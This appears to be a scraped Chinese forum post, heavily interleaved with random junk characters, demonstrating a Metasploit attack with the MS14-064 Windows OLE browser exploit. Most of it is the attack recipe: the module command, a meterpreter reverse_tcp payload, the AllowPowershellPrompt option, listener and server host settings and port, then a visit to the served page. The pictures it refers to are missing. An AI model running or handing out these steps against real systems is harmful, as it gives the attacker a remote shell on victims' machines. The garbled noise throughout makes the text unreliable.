" X9 z: b3 F6 N* p 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示0 q* T! H4 Y% |- e$ S0 U! w# x
# ?6 ] ^7 V+ `
; c( a3 m1 g: f! Q+ z
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
' | ?8 N1 O# i2 T' G; t" f" Y
9 [3 e! I0 m1 [0 S3 T- v% @4 J
: g, y1 K, B* K- L) k4 y0 }/ v O 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
' v8 g; x$ h! ~ k3 ]2 ?
; G/ M! @4 L% B! j/ K& F+ p
E; u7 v0 A+ O set AllowPowershellPrompt true
2 h0 N1 T7 A; T: B: V( n
4 l' K& }5 N/ B$ R( q6 m* ^
0 o. B. B$ H9 f, y1 k) c6 T4 { Set LHOST 192.168.0.109+ h, i0 U* { P) T. M
% F) ?" N2 t7 |" I* q
+ a+ k! d! F$ { set SRVHOST 192.168.0.109
% e% m- X2 O' W& K% M
/ h, F( g) { T' t: U: Z- u* V' |( n/ e& X0 @
Set uripath share
0 C' L+ E, p) h- G
0 l0 n2 {9 u% e2 j7 k C
# D+ M# X9 Z K4 s: u5 z3 \ Set srvport 80
2 p5 a9 `& M% ~
7 t! v9 i( T+ P4 S6 f) J
0 ~7 Y+ u1 g- p! ~; Q 
) H5 t" K4 S J. |5 a/ o; }2 |; i
" C" u7 W( ^+ w g% d e7 Y- x' x! e: S7 i* c6 D" x4 T E5 A8 }
* s/ y, L3 \0 E, D
5 {5 J* B& H* y" H. ^' d1 D1 ~3 B8 M1 g3 E3 T+ s2 p
) {2 y4 A9 @0 {$ N* i
1 ?* C& F8 b) i! s( `; w6 @# Y4 @, Z& A( z
& G( G/ i/ y9 f$ m+ P( w
% @$ K* c `) K' D. ~" E" ^" k K, C- [
5 M. }* {( ]3 I5 y
# I/ u' N2 }, t
: O6 P) i3 j' j/ K 下面我们来访问本地地址如图:" ^( r3 ~4 p7 ?8 G2 V6 J1 Q
4 r7 U9 q7 D/ }* U% j' `
6 F- E- u& O7 _, n# U0 M0 t . O! M2 j5 d; E. c
, F* [3 T0 {9 m/ Z1 {& ~0 W
/ ^* o3 O/ }% c5 _9 |4 |) P + Z% w; O! @1 e8 n6 P2 h: V1 p
8 L7 v% m3 I4 ~$ S, a
5 @5 Z$ }& @$ v, Y 
; j0 d( J( K$ X$ S